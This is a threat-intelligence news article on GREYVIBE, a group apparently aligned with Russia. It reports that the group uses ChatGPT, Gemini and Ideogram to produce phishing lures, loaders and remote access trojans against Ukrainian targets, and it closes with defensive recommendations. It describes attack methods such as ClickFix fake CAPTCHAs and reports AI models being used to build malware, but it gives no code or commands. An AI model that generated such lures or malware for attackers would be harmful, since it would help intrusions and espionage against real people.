A newly identified threat actor called GREYVIBE is leveraging generative AI tools — including ChatGPT, Google Gemini, and Ideogram AI — to supercharge cyberattack operations against Ukrainian government, military, and civilian targets. Researchers at WithSecure have tracked the group since at least August 2025, identifying consistent overlaps in infrastructure, tooling, and operational behavior across multiple campaigns.
Who Is GREYVIBE?
GREYVIBE is a previously untracked threat group that has emerged in the context of the ongoing Russia-Ukraine conflict. While no definitive nation-state attribution has been established, the group’s activities align strongly with Russian state interests: researchers found Russian-language artifacts throughout the malware code, observed activity patterns consistent with the Moscow time zone, and noted targeting almost exclusively focused on Ukrainian institutions — government agencies, military units, and civilian organizations.
The group demonstrates signs of operational immaturity in some areas, with poor OPSEC practices such as uploading test samples to public malware repositories. However, its use of AI-assisted development allows it to punch above its technical weight class, rapidly iterating on tools and reducing reliance on reused code that traditional detection methods can fingerprint.
AI-Assisted Attack Development
What makes GREYVIBE particularly noteworthy is its systematic use of generative AI across the full attack lifecycle. WithSecure researchers observed AI-generated code patterns in obfuscators and loaders (named DAYLIGHT and TEASOUP), and in the development of LegionRelay — a custom PowerShell-based remote access trojan. Tools such as ChatGPT and Google Gemini were reportedly used for:
- Generating convincing Ukrainian-language phishing lures impersonating government agencies
- Developing malware components and obfuscation layers
- Creating imagery for lure documents using Ideogram AI
- Supporting post-compromise activities and lateral movement scripts
This AI-assisted approach lowers the technical barrier to entry and accelerates development cycles, while making traditional attribution methods harder since AI-generated code lacks the distinctive stylistic fingerprints of human authors.
Multi-Vector Attack Campaigns
GREYVIBE employs a diverse attack strategy combining several delivery methods:
- Spear-phishing emails: Attackers impersonate Ukrainian government agencies and distribute malicious archives via cloud services such as Google Drive. Payloads execute decoy documents while silently initiating infection chains using custom loaders.
- Fake CAPTCHA pages: Victims are tricked into executing malicious commands under the guise of completing a verification step — a technique known as ClickFix or CAPTCHAJack.
- Deceptive “adult club” websites: These platforms target Ukrainian individuals, particularly military personnel, delivering malware and engaging in social engineering through fake personas on Telegram.
Malware Toolkit: PhantomRelay, FallSpy, and LegionRelay
GREYVIBE deploys three primary malware families:
- PhantomRelay — A modular remote access trojan (RAT) for Windows that uses WebSockets for command execution. It supports file theft, screenshot capture, and exfiltration of messaging data from platforms like Discord and Telegram.
- FallSpy — An Android spyware component that exfiltrates contacts, location data, SMS messages, and device identifiers from the victim’s mobile device.
- LegionRelay — A PowerShell-based RAT developed with significant AI assistance. Ironically, its AI-assisted development introduced exploitable design weaknesses: WithSecure researchers identified flaws in LegionRelay’s backend that exposed attacker infrastructure and allowed them to monitor the group’s activity over time.
AI Jailbreaking and the Broader Threat
The GREYVIBE campaign is consistent with broader trends documented by multiple threat intelligence firms: nation-state-aligned and cybercriminal actors are increasingly using LLM-generated content for malware development, phishing content generation, and social engineering scripts. The fact that a relatively unsophisticated actor can produce operationally effective tools with AI assistance significantly lowers the barrier to entry for cyberattacks.
GREYVIBE’s overlap with known cybercrime infrastructure also suggests a hybrid threat model, where former or active cybercriminals are recruited or contracted to carry out operations aligned with state interests — a pattern previously seen with Russian-aligned groups like Sandworm and the Conti-derived ecosystem.
Recommendations
Organizations with ties to Ukraine or those targeted by Russian intelligence-gathering should take the following steps:
- Implement robust email filtering capable of detecting AI-generated phishing content, including Ukrainian-language lures.
- Block execution of commands initiated via browser interactions (mitigates ClickFix/CAPTCHA-based delivery).
- Deploy endpoint detection covering PowerShell-based RATs and WebSocket-based C2 communications.
- Monitor for FallSpy-style Android malware in environments where BYOD policies are in use.
- Apply LLM-aware threat intelligence frameworks when assessing attacker TTPs, as AI-generated code patterns are increasingly common in nation-state toolkits.